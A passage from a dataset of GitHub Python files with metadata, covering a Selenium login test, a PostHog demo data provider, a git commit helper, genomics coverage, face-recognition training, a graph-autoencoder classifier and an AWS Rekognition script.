[{"api_name": "scipy.sparse.issparse", "line_number": 7, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 10, "usage_type": "call"}, {"api_name": "sklearn.cluster.MiniBatchKMeans", "line_number": 15, "usage_type": "call"}, {"api_name": "sklearn.cluster.KMeans", "line_number": 19, "usage_type": "call"}]} +{"seq_id": "12040567632", "text": "\"\"\"\n登录测试用例\n\"\"\"\nimport json\nimport unittest\nimport time\n\nfrom config import BASE_DIR\nfrom page.index_page import IndexProxy\nfrom page.login_page import LoginProxy\nfrom utils import DriverUtil\nfrom parameterized import parameterized\n\n\ndef build_login_data():\n \"\"\"登录数据构造方法\"\"\"\n # with open('../data/login_data.json', encoding='utf-8') as f:\n with open(BASE_DIR + '/data/login_data.json', encoding='utf-8') as f:\n data = json.load(f)\n data_list = list()\n for i in data:\n data_list.append((i.get('username'),\n i.get('password'),\n i.get('code'),\n i.get('expect')))\n print(data_list)\n return data_list\n\n\nclass TPShopLogin(unittest.TestCase):\n \"\"\"登录测试用例\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.driver = DriverUtil.get_driver() # 获取浏览器对象\n cls.index_proxy = IndexProxy() # 首页页面业务执行对象\n cls.login_proxy = LoginProxy() # 登录页面业务执行对象\n\n @classmethod\n def tearDownClass(cls):\n time.sleep(2)\n DriverUtil.quit_driver() # 退出浏览器对象\n\n def setUp(self):\n self.driver.get('http://127.0.0.1') # 打开首页\n self.index_proxy.go_to_login() # 跳转登录页面\n\n @parameterized.expand(build_login_data())\n def test_login(self, username, pwd, code, expect):\n \"\"\"登录测试方法\"\"\"\n self.login_proxy.login_func(username, pwd, code) # 执行登录\n time.sleep(10)\n title = self.driver.title # 获取页面标题\n print(\"title:\", title)\n self.assertIn(expect, title) # 断言判断结果\n\n\nif __name__ == '__main__':\n unittest.main()\n", "repo_name": "limy-liu/test_limy", "sub_path": "script/hm_01_tpshop_login.py", "file_name": "hm_01_tpshop_login.py", "file_ext": "py", "file_size_in_byte": 1789, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "config.BASE_DIR", "line_number": 18, "usage_type": "name"}, {"api_name": "json.load", "line_number": 19, "usage_type": "call"}, {"api_name": "unittest.TestCase", "line_number": 30, "usage_type": "attribute"}, {"api_name": "utils.DriverUtil.get_driver", "line_number": 35, "usage_type": "call"}, {"api_name": "utils.DriverUtil", "line_number": 35, "usage_type": "name"}, {"api_name": "page.index_page.IndexProxy", "line_number": 36, "usage_type": "call"}, {"api_name": "page.login_page.LoginProxy", "line_number": 37, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 41, "usage_type": "call"}, {"api_name": "utils.DriverUtil.quit_driver", "line_number": 42, "usage_type": "call"}, {"api_name": "utils.DriverUtil", "line_number": 42, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 52, "usage_type": "call"}, {"api_name": "parameterized.parameterized.expand", "line_number": 48, "usage_type": "call"}, {"api_name": "parameterized.parameterized", "line_number": 48, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "32893558011", "text": "from typing import Dict, List, Tuple\n\nimport mimesis\nimport mimesis.random\n\nWeightedPool = Tuple[List[str], List[int]]\n\n\nclass PropertiesProvider(mimesis.BaseProvider):\n # Somewhat realistically segmented and weighted pools for random properties: device type/OS/browser\n DEVICE_TYPE_WEIGHTED_POOL: WeightedPool = ([\"Desktop\", \"Mobile\", \"Tablet\"], [8, 1, 1])\n OS_WEIGHTED_POOLS: Dict[str, WeightedPool] = {\n \"Desktop\": ([\"Windows\", \"Mac OS X\", \"Linux\", \"Chrome OS\"], [18, 16, 7, 1]),\n \"Mobile\": ([\"iOS\", \"Android\"], [1, 1]),\n \"Tablet\": ([\"iOS\", \"Android\"], [1, 1]),\n }\n BROWSER_WEIGHTED_POOLS: Dict[str, WeightedPool] = {\n \"Windows\": ([\"Chrome\", \"Firefox\", \"Opera\", \"Microsoft Edge\", \"Internet Explorer\"], [12, 4, 2, 1, 1]),\n \"Mac OS X\": ([\"Chrome\", \"Firefox\", \"Opera\", \"Safari\"], [4, 2, 1, 2]),\n \"Linux\": ([\"Chrome\", \"Firefox\", \"Opera\"], [3, 3, 1]),\n \"Chrome OS\": ([\"Chrome\"], [1]),\n \"iOS\": ([\"Mobile Safari\", \"Chrome iOS\", \"Firefox iOS\"], [8, 1, 1]),\n \"Android\": ([\"Chrome\", \"Android Mobile\", \"Samsung Internet\", \"Firefox\"], [5, 3, 3, 1]),\n }\n\n random: mimesis.random.Random\n\n def device_type_os_browser(self) -> Tuple[str, str, str]:\n device_type_pool, device_type_weights = self.DEVICE_TYPE_WEIGHTED_POOL\n device_type = self.random.choices(device_type_pool, device_type_weights)[0]\n os_pool, os_weights = self.OS_WEIGHTED_POOLS[device_type]\n os = self.random.choices(os_pool, os_weights)[0]\n browser_pool, browser_weights = self.BROWSER_WEIGHTED_POOLS[os]\n browser = self.random.choices(browser_pool, browser_weights)[0]\n return device_type, os, browser\n", "repo_name": "lokeshpahal/posthog1", "sub_path": "posthog/demo/matrix/randomization.py", "file_name": "randomization.py", "file_ext": "py", "file_size_in_byte": 1693, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "typing.Tuple", "line_number": 6, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 6, "usage_type": "name"}, {"api_name": "mimesis.BaseProvider", "line_number": 9, "usage_type": "attribute"}, {"api_name": "typing.Dict", "line_number": 12, "usage_type": "name"}, {"api_name": "typing.Dict", "line_number": 17, "usage_type": "name"}, {"api_name": "mimesis.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 28, "usage_type": "name"}]} +{"seq_id": "28989579838", "text": "#https://www.zhihu.com/question/269707221/answer/2677167861\ndef commit(content):\n import git\n repo = git.Repo(search_parent_directories=True)\n try:\n g = repo.git\n g.add(\"--all\")\n res = g.commit(\"-m \" + content)\n print(res)\n except Exception as e:\n print(\"no need to commit\")", "repo_name": "K-Nick/MS-DETR", "sub_path": "kn_util/basic/git_utils.py", "file_name": "git_utils.py", "file_ext": "py", "file_size_in_byte": 321, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 13, "dataset": "github-code", "pt": "52", "api": [{"api_name": "git.Repo", "line_number": 4, "usage_type": "call"}]} +{"seq_id": "16506360462", "text": "# Standard Python libraries\nfrom pathlib import Path\n\n# https://github.com/usnistgov/DataModelDict\nfrom DataModelDict import DataModelDict as DM\n\n# http://www.numpy.org/\nimport numpy as np\n\n# https://github.com/usnistgov/atomman\nimport atomman as am\n\n# iprPy imports\nfrom .. import libdir\n\ndef assign_composition(df, database, lib_directory=None):\n \"\"\"\n Assigns compositions to calculations.\n \"\"\"\n # Build counts for available prototypes\n prototypes = database.get_records(style='crystal_prototype')\n counts = {}\n for prototype in prototypes:\n counts[prototype.name] = np.unique(prototype.content.finds('component'), return_counts=True)[1]\n \n # Set default lib_directory (for ref structures)\n if lib_directory is None:\n lib_directory = libdir\n \n # Identify compositions\n compositions = []\n for i, series in df.iterrows():\n \n # Use ucell system if available (crystal_space_group)\n if 'ucell' in series:\n composition = series.ucell.composition\n if composition is not None:\n compositions.append(composition)\n else:\n compositions.append(np.nan)\n \n # Use symbols and family info if available (E_vs_r_scan, relax_*) \n elif 'symbols' in series and 'family' in series:\n \n # If family is a prototype\n if series.family in counts:\n compositions.append(am.tools.compositionstr(series.symbols, counts[series.family]))\n \n # If family is a ref\n else:\n elements = '-'.join(np.unique(series.symbols))\n fname = Path(lib_directory, 'reference_crystal', series.family + '.json')\n try:\n ucell = am.load('system_model', fname)\n except:\n compositions.append(np.nan)\n else:\n count = np.unique(ucell.atoms.atype, return_counts=True)[1]\n compositions.append(am.tools.compositionstr(ucell.symbols, count))\n else:\n compositions.append(np.nan)\n df['composition'] = compositions", "repo_name": "lmhale99/iprPy_diatom_scan", "sub_path": "iprPy/analysis/assign_composition.py", "file_name": "assign_composition.py", "file_ext": "py", "file_size_in_byte": 2163, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "numpy.unique", "line_number": 24, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 40, "usage_type": "attribute"}, {"api_name": "atomman.tools.compositionstr", "line_number": 47, "usage_type": "call"}, {"api_name": "atomman.tools", "line_number": 47, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 51, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 52, "usage_type": "call"}, {"api_name": "atomman.load", "line_number": 54, "usage_type": "call"}, {"api_name": "numpy.nan", "line_number": 56, "usage_type": "attribute"}, {"api_name": "numpy.unique", "line_number": 58, "usage_type": "call"}, {"api_name": "atomman.tools.compositionstr", "line_number": 59, "usage_type": "call"}, {"api_name": "atomman.tools", "line_number": 59, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 61, "usage_type": "attribute"}]} +{"seq_id": "8478257298", "text": "#!/usr/bin/env python\n\nimport sys\nimport csv\n\nimport numpy as np\nimport h5py\nimport pysam\n\nimport logging\nlogging.basicConfig(\n level=logging.INFO, format='%(asctime)s|%(levelname)s|%(message)s')\n\n\n\"\"\"SAM is 1-based while BAM is 0-based, pysam always follow python convention,\nso do my codes\"\"\"\n\n\ndef extract_barcode(query_name, lib_id=None):\n bc = query_name.split('_')[-1]\n if lib_id is not None:\n bc += '-{0}'.format(lib_id)\n return bc\n\n\ndef update_span(old, new):\n \"\"\"be functional, yey!\"\"\"\n return (\n min(old[0], new[0]),\n max(old[1], new[1]),\n old[2] + new[2] # update read_count\n )\n\n\n# def gen_span_tuple(rec):\n# return (\n# rec.reference_start,\n# rec.reference_end,\n# 1\n# )\n\n\ndef parse_bam_record(rec):\n rn = rec.reference_name\n beg = int(rec.reference_start)\n end = int(rec.reference_end)\n return rn, beg, end\n\n\ndef pass_qc(sam_record):\n \"\"\"pass quality check or not\"\"\"\n rec = sam_record\n return not (\n rec.reference_id == -1\n or rec.reference_end is None # read is unmapped or no cigar alignment\n # or rec.mapping_quality == 0\n )\n\n\n# def get_lib_id(input_bam, dd):\n# for k in dd.keys():\n# if k in input_bam:\n# return dd[k]\n\n\n# def update_read_cov_arr(arr, rec):\n# arr[rec.reference_start: rec.reference_end] += 1\n\n\ndef gen_barcode_and_read_cov(input_bam, lib_id, contig_len_dd, out_h5):\n \"\"\"lib_id: library id, used to disambiguate barcodes from different\n libraries\"\"\"\n rc_arr = None # read coverage\n bc_arr = None # barcode covervage\n curr_rn = None # current ref name\n bc_span_dd = None\n num_parsed_contigs = 0\n\n logging.info('reading {0}'.format(input_bam))\n infile = pysam.AlignmentFile(input_bam)\n\n h5_writer = h5py.File(out_h5, \"w\")\n\n for k, rec in enumerate(infile):\n if not pass_qc(rec):\n continue\n rn, beg, end = parse_bam_record(rec)\n\n # process barcode span\n bc = extract_barcode(rec.query_name, lib_id)\n span = (beg, end, 1) # 1 is read count\n\n if curr_rn is None:\n curr_rn = rn\n contig_len = contig_len_dd[curr_rn]\n rc_arr = np.zeros((contig_len,), dtype=np.uint)\n bc_arr = np.zeros((contig_len,), dtype=np.uint)\n bc_span_dd = {bc: span}\n else:\n if curr_rn != rn:\n # write rc_arr to h5\n h5_writer.create_dataset(\"{0}/rc\".format(curr_rn), data=rc_arr)\n\n # fillup bc_arr from info in bc_span_dd\n for (bc, (span_beg, span_end, _)) in bc_span_dd.items():\n bc_arr[span_beg:span_end] += 1\n h5_writer.create_dataset(\"{0}/bc\".format(curr_rn), data=bc_arr)\n\n num_parsed_contigs += 1\n\n # init variables\n curr_rn = rn\n contig_len = contig_len_dd[curr_rn]\n rc_arr = np.zeros((contig_len,), dtype=np.uint)\n bc_arr = np.zeros((contig_len,), dtype=np.uint)\n bc_span_dd = {bc: span}\n\n # update read cov\n rc_arr[beg:end] += 1\n\n # update span_dd\n if bc in bc_span_dd:\n bc_span_dd[bc] = update_span(bc_span_dd[bc], span)\n else:\n bc_span_dd[bc] = span\n\n if (k + 1) % 1000000 == 0:\n logging.info(\n 'processed {0} records from {1}'.format(k + 1, input_bam))\n\n # write rc_arr to h5\n h5_writer.create_dataset(\"{0}/rc\".format(curr_rn), data=rc_arr)\n\n # fillup bc_arr from info in bc_span_dd\n for (bc, (span_beg, span_end, _)) in bc_span_dd.items():\n bc_arr[span_beg:span_end] += 1\n h5_writer.create_dataset(\"{0}/bc\".format(curr_rn), data=bc_arr)\n\n num_parsed_contigs += 1\n\n logging.info('Parsed {0} contigs intotal'.format(num_parsed_contigs))\n logging.info('finished parsing {0}'.format(input_bam))\n\n h5_writer.close()\n\n# def write_span_results(span_dd, output):\n# logging.info('writing results to {0}'.format(output))\n\n# with open(output, 'wt') as opf:\n# csvwriter = csv.writer(opf, delimiter='\\t')\n# total_contigs = len(span_dd.keys())\n# for ck, (contig, val_dd) in enumerate(span_dd.items()):\n# for (bc, values) in val_dd.items():\n# if lib_id:\n# bc += '-{0}'.format(lib_id)\n# csvwriter.writerow([contig, bc] + list(values))\n# if (ck + 1) % 100000 == 0:\n# logging.info('processed {0}/{1} ({2:.2%})'.format(\n# ck + 1, total_contigs, (ck + 1) / total_contigs))\n# logging.info('processed {0}/{1} ({2:.2%})'.format(\n# ck + 1, total_contigs, (ck + 1) / total_contigs))\n\n\nif __name__ == \"__main__\":\n out_csv = sys.argv[1]\n lib_id = sys.argv[2]\n in_bam = sys.argv[3] # e.g. already merged from the same library\n\n # gen_barcode_and_read_cov(in_bam, lib_id)\n # write_span_results(res, out_csv)\n", "repo_name": "zyxue/assembly-inspector", "sub_path": "calc_cov.py", "file_name": "calc_cov.py", "file_ext": "py", "file_size_in_byte": 5055, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 11, "usage_type": "call"}, {"api_name": "logging.INFO", "line_number": 12, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 79, "usage_type": "call"}, {"api_name": "pysam.AlignmentFile", "line_number": 80, "usage_type": "call"}, {"api_name": "h5py.File", "line_number": 82, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 96, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 96, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 97, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 97, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 114, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 114, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 115, "usage_type": "call"}, {"api_name": "numpy.uint", "line_number": 115, "usage_type": "attribute"}, {"api_name": "logging.info", "line_number": 128, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 141, "usage_type": "call"}, {"api_name": "logging.info", "line_number": 142, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 165, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 166, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 167, "usage_type": "attribute"}]} +{"seq_id": "11608897947", "text": "from logging import exception\nfrom tkinter import*\nfrom tkinter import ttk\nfrom turtle import color\nfrom PIL import Image, ImageTk\nfrom tkinter import messagebox\n\nfrom setuptools import Command\nimport mysql.connector\nimport cv2\nimport os #for accessing folders and files\nimport numpy as np\n\n\nclass Train:\n def __init__(self, root):\n self.root = root\n self.root.geometry(\"1530x790+0+0\") #set according to display size\n self.root.title(\"face Recognition System\")\n self.root.wm_iconbitmap(\"face.ico\")\n\n\n\n # background\n\n bg1_lbl = Frame(self.root, bg=\"#E4D1B9\")\n bg1_lbl.place(x=0, y=0, width=15300, height=10000)\n\n title_lbl = Label(bg1_lbl, text=\"STUDENT MANAGEMENT SYSTEM\", font=(\n \"times new roma\", 35, \"bold\"),bg=\"#B8F1B0\", fg=\"#16003B\")\n title_lbl.place(x=0, y=40, width=1530, height=45)\n\n \n #button\n\n img6 = Image.open(\n r\"images\\train.jpg\")\n img6 = img6.resize((300, 300), Image.ANTIALIAS)\n self.photoimg6 = ImageTk.PhotoImage(img6)\n\n b1 = Button(bg1_lbl, image=self.photoimg6, cursor=\"hand2\")\n b1.place(x=600, y=200, width=300, height=300)\n\n b1_1 = Button(bg1_lbl, text=\"Train Data\",command=self.train_classifier, cursor=\"hand2\", font=(\n \"times new roman\", 15, \"bold\"), bg=\"#764AF1\", fg=\"white\",activeforeground=\"white\", activebackground=\"red\")\n b1_1.place(x=600, y=500, width=300, height=40)\n\n def train_classifier(self):\n data_dir=(\"data\")\n path=[os.path.join(data_dir,file) for file in os.listdir(data_dir)]\n\n faces=[]\n ids=[]\n \n for image in path:\n img=Image.open(image).convert('L') #Gray scale image\n imageNp=np.array(img,'uint8')\n id=int(os.path.split(image)[1].split('.')[1])\n\n faces.append(imageNp)\n ids.append(id)\n\n cv2.imshow(\"Trian\",imageNp)\n cv2.waitKey(1)==13\n ids=np.array(ids)\n\n #Train the classifier and save\n\n clf=cv2.face.LBPHFaceRecognizer_create() #for recognize face \n clf.train(faces,ids) #train\n \n clf.write(\"classifier.xml\")\n cv2.destroyAllWindows()\n messagebox.showinfo(\"Result\",\"Training datasets completed\",parent=self.root)\n\n\nif __name__ == \"__main__\":\n root = Tk()\n obj = Train(root)\n root.mainloop()", "repo_name": "aryanjais1234/Face_Reco", "sub_path": "train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 2436, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}, {"api_name": "PIL.Image.ANTIALIAS", "line_number": 38, "usage_type": "attribute"}, {"api_name": "PIL.Image", "line_number": 38, "usage_type": "name"}, {"api_name": "PIL.ImageTk.PhotoImage", "line_number": 39, "usage_type": "call"}, {"api_name": "PIL.ImageTk", "line_number": 39, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 50, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 56, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 56, "usage_type": "name"}, {"api_name": "numpy.array", "line_number": 57, "usage_type": "call"}, {"api_name": "os.path.split", "line_number": 58, "usage_type": "call"}, {"api_name": "os.path", "line_number": 58, "usage_type": "attribute"}, {"api_name": "cv2.imshow", "line_number": 63, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 65, "usage_type": "call"}, {"api_name": "cv2.face.LBPHFaceRecognizer_create", "line_number": 69, "usage_type": "call"}, {"api_name": "cv2.face", "line_number": 69, "usage_type": "attribute"}, {"api_name": "cv2.destroyAllWindows", "line_number": 73, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 74, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "32421140298", "text": "# Install required packages.\nimport datetime\nimport os\nimport torch\nimport numpy as np\nfrom sklearn.model_selection import KFold\nimport matplotlib.pyplot as plt\nfrom sklearn.manifold import TSNE\nimport torch.nn.functional as F\nfrom torch_geometric.transforms import RandomLinkSplit, RandomNodeSplit\nfrom torch_geometric.utils import train_test_split_edges\n\nfrom models import GCNEncoder\nfrom models import GCN\nfrom torch_geometric.nn import GAE\nfrom torch_geometric.nn import GCNConv\nfrom metrics import nmi_score, ari_score, cluster_acc\n\nos.environ['TORCH'] = torch.__version__\nprint(torch.__version__)\n\ndevice = torch.device('cuda' if torch.cuda.is_available() else 'cpu')\n\n'''\nprint(\"==========RandomLinkSplit==========\")\ntransform = RandomLinkSplit(is_undirected=True)\ntrain_data, val_data, test_data = transform(data)\ntrain_mask = [1 if i in train_data.edge_label_index[0] else 0 for i in range(0,data.num_nodes)]\nval_mask = [1 if i in val_data.edge_label_index[0] else 0 for i in range(0,data.num_nodes)]\ntrain_num = sum(train_mask)\nval_num = sum(val_mask)\n\nx = train_data.x.to(device)\ny = data.y.long().to(device)\ntrain_pos_edge_index = train_data.edge_label_index.to(device)\nval_pos_edge_index = val_data.edge_label_index.to(device)\n'''\n# 不同的数据集\n# data_path = './data/split_data.pt' # 原始的Geolife(86113)\n# data_path = './feature_learning/bert/data/gnn/geolife_ts/processed/data.pt'\ndata_path = './feature_learning/bert/data/gnn/geolife_ts/processed' # timeslot的Geolife(275)\ndata_path = './feature_learning/bert/data/gnn/geolife_ts_79/processed' # max_len设为79的Geolife(61147)\n# data_path = './data/gnn/filtered/processed'\ndata_path = './feature_learning/bert/data/gnn/geolife_e2dtc_filtered/processed'\n\nprint(15*'='+'Load Dataset'+15*'=')\ndata = torch.load(data_path+'/split_edges_data.pt')\n\n# print(\"==========train_test_split_edges(data)==========\")\n# data.train_mask = data.val_mask = data.test_mask = None\n# data = train_test_split_edges(data)\n# torch.save(data, data_path + '/split_edges_data.pt')\n# data = dataset[0]\nprint(data)\nprint()\n\n'''\ntrain_mask = torch.tensor([True if i in data.train_pos_edge_index[0] else False for i in range(0,data.num_nodes)])\nval_mask = torch.tensor([True if i in data.val_pos_edge_index[0] else False for i in range(0,data.num_nodes)])\ntest_mask =torch.tensor([True if i in data.test_pos_edge_index[0] else False for i in range(0,data.num_nodes)])\n'''\n\nprint(15*'='+'Split Nodes'+15*'=')\ntransform = RandomNodeSplit(split='train_rest',num_val=0.1,num_test=0.1)\ndata = transform(data)\ntrain_mask = data.train_mask\nval_mask = data.val_mask\ntest_mask = data.test_mask\nprint(data)\nprint()\n\ntrain_num = sum(train_mask)\nval_num = sum(val_mask)\ntest_num = sum(test_mask)\nprint('train_num: {}, val_num: {}, test_num: {}'.format(train_num, val_num, test_num))\n\nx = data.x.to(device)\ny = data.y.long().to(device)\ntrain_pos_edge_index = data.train_pos_edge_index.to(device)\nval_pos_edge_index = data.val_pos_edge_index.to(device)\ntest_pos_edge_index = data.test_pos_edge_index.to(device)\n# parameters\nout_channels = 256\nnum_features = data.num_features\nepochs = 200\n\n# model\nclass MODEL(torch.nn.Module):\n def __init__(self, num_features=256, out_channels=out_channels, hidden_channels=64):\n super().__init__()\n torch.manual_seed(1234567)\n self.gaeLayer = GAE(GCNEncoder(num_features, out_channels))\n self.classifyLayer = GCN(out_channels, hidden_channels)\n\n def forward(self, x, edge_index):\n z = self.gaeLayer.encoder.forward(x, edge_index)\n c = self.classifyLayer.forward(z, edge_index)\n return c\n\nmodel = MODEL(num_features, out_channels, hidden_channels=64)\nprint(15*'='+'Print Model'+15*'=')\nprint(model)\n\n# move to GPU (if available)\nmodel = model.to(device)\n\n# inizialize the optimizer\noptimizer = torch.optim.Adam(model.parameters(), lr=0.01)\ncriterion = torch.nn.CrossEntropyLoss().to(device)\n\ndef train():\n model.train()\n optimizer.zero_grad()\n z = model.gaeLayer.encode(x, train_pos_edge_index)\n out = model.classifyLayer(z, train_pos_edge_index)\n # Compute the loss solely based on the training nodes.\n recon_loss = model.gaeLayer.recon_loss(z, train_pos_edge_index)\n classify_loss = criterion(out[train_mask], y[train_mask])\n # if args.variational:\n loss = recon_loss + classify_loss\n\n # loss = loss + (1 / data.num_nodes) * model.kl_loss()\n\n loss.backward()\n optimizer.step()\n\n pred = out.argmax(dim=1) # Use the class with highest probability.\n pred_result = pred[train_mask]\n label = y[train_mask] # Check against ground-truth labels.\n\n # train_correct = pred_result.eq(label)\n # tmp1 = train_correct.sum()\n # tmp2 = train_mask.long().sum()\n # train_acc = int(tmp1) / int(tmp2) # Derive ratio of correct predictions.\n\n train_acc = cluster_acc(label.cpu().numpy(), pred_result.cpu().numpy()) # UACC\n nmi = nmi_score(label.cpu(), pred_result.cpu())\n ari = ari_score(label.cpu(), pred_result.cpu())\n\n return recon_loss, classify_loss, train_acc, nmi, ari\n\n\ndef test():\n model.eval()\n with torch.no_grad():\n z = model.gaeLayer.encode(x, test_pos_edge_index)\n out = model.classifyLayer(z, test_pos_edge_index)\n pred = out.argmax(dim=1) # Use the class with highest probability.\n correct = pred[test_mask].eq(y[test_mask]) # Check against ground-truth labels.\n acc = int(correct.sum()) / int(sum(test_mask)) # Derive ratio of correct predictions.\n nmi = nmi_score(y[test_mask].cpu(), pred[test_mask].cpu())\n ari = ari_score(y[test_mask].cpu(), pred[test_mask].cpu())\n return acc, nmi, ari\n\ndef val():\n model.eval()\n with torch.no_grad():\n z = model.gaeLayer.encode(x, val_pos_edge_index)\n out = model.classifyLayer(z, val_pos_edge_index)\n recon_loss = model.gaeLayer.recon_loss(z, val_pos_edge_index)\n classify_loss = criterion(out[val_mask], y[val_mask])\n pred = out.argmax(dim=1) # Use the class with highest probability.\n correct = pred[val_mask].eq(y[val_mask]) # Check against ground-truth labels.\n acc = int(correct.sum()) / int(sum(val_mask)) # Derive ratio of correct predictions.\n nmi = nmi_score(y[val_mask].cpu(), pred[val_mask].cpu())\n ari = ari_score(y[val_mask].cpu(), pred[val_mask].cpu())\n\n return recon_loss, classify_loss, acc, nmi, ari\n\nfrom torch.utils.data import Dataset, DataLoader,TensorDataset,random_split,SubsetRandomSampler, ConcatDataset\n\nprint(15*'='+'Start Training'+15*'=')\nprint(\"Total Epochs:\", epochs)\nfor epoch in range(1, epochs+1):\n\n train_recon_loss, train_classify_loss, train_acc, train_nmi, train_ari = train()\n val_recon_loss, val_classify_loss, val_acc, val_nmi, val_ari= val()\n print(f'Epoch: {epoch:03d}')\n print(\"Time:\", datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n print(f'Train Loss: {train_recon_loss+train_classify_loss:.4f}, Train Acc: {train_acc:.4f}, Train NMI: {train_nmi:.4f}, Train ARI: {train_ari:.4f}, recon_loss: {train_recon_loss:.4f}, cross_entropy_loss: {train_classify_loss:.4f}'\n f'\\nVal Loss: {val_recon_loss+val_classify_loss:.4f}, Val Acc: {val_acc:.4f}, Val NMI: {val_nmi:.4f}, Val ARI: {val_ari:.4f}, recon_loss: {val_recon_loss:.4f}, cross_entropy_loss: {val_classify_loss:.4f}')\n\nacc, nmi, ari = test()\nprint(15*'=' + 'Test Result' + 15*'=')\nprint(f'test_acc: {acc:.4f}, test_nmi: {nmi:.4f}, test_ari: {ari:.4f}')\n\ntorch.save(model,'./models/GAE.pt')\n", "repo_name": "Zhenyu-Lii/traj_clustering", "sub_path": "classification_GAE.py", "file_name": "classification_GAE.py", "file_ext": "py", "file_size_in_byte": 7490, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.__version__", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.__version__", "line_number": 20, "usage_type": "attribute"}, {"api_name": "torch.device", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 22, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 22, "usage_type": "attribute"}, {"api_name": "torch.load", "line_number": 47, "usage_type": "call"}, {"api_name": "torch_geometric.transforms.RandomNodeSplit", "line_number": 64, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 88, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 91, "usage_type": "call"}, {"api_name": "torch_geometric.nn.GAE", "line_number": 92, "usage_type": "call"}, {"api_name": "models.GCNEncoder", "line_number": 92, "usage_type": "call"}, {"api_name": "models.GCN", "line_number": 93, "usage_type": "call"}, {"api_name": "torch.optim.Adam", "line_number": 108, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 108, "usage_type": "attribute"}, {"api_name": "torch.nn.CrossEntropyLoss", "line_number": 109, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 109, "usage_type": "attribute"}, {"api_name": "metrics.cluster_acc", "line_number": 136, "usage_type": "call"}, {"api_name": "metrics.nmi_score", "line_number": 137, "usage_type": "call"}, {"api_name": "metrics.ari_score", "line_number": 138, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 145, "usage_type": "call"}, {"api_name": "metrics.nmi_score", "line_number": 151, "usage_type": "call"}, {"api_name": "metrics.ari_score", "line_number": 152, "usage_type": "call"}, {"api_name": "torch.no_grad", "line_number": 157, "usage_type": "call"}, {"api_name": "metrics.nmi_score", "line_number": 165, "usage_type": "call"}, {"api_name": "metrics.ari_score", "line_number": 166, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 179, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 179, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "35032662062", "text": "#usr/bin/env python\nimport click\nimport boto3\n\ndef labels(bucket, name):\n\t\"\"\"This takes an S3 bucket and a image name\"\"\"\n\t\n\tprint(f\"This is the bucketname {bucket} !\")\n\tprint(f\"This is the imagename {name} !\")\n\trekognition = boto3.client(\"rekognition\")\n\tresponse = rekognition.detect_labels(\n\t\t\tImage={\n\t\t\t\t\"S3Object\": {\n\t\t\t\t\t\"Bucket\": bucket,\n\t\t\t\t\t\"Name\": name,\n\t\t\t\t}\n\t\t\t},\n\t\t)\n\tlabels = response['Labels']\nbucket =\"function-bike-rider-ms\"\nname =\"cat.jpg\"\nresults = labels(bucket,name)\t\nprint (results)\n\t", "repo_name": "Manjima24/function-bike-rider", "sub_path": "labels.py", "file_name": "labels.py", "file_ext": "py", "file_size_in_byte": 505, 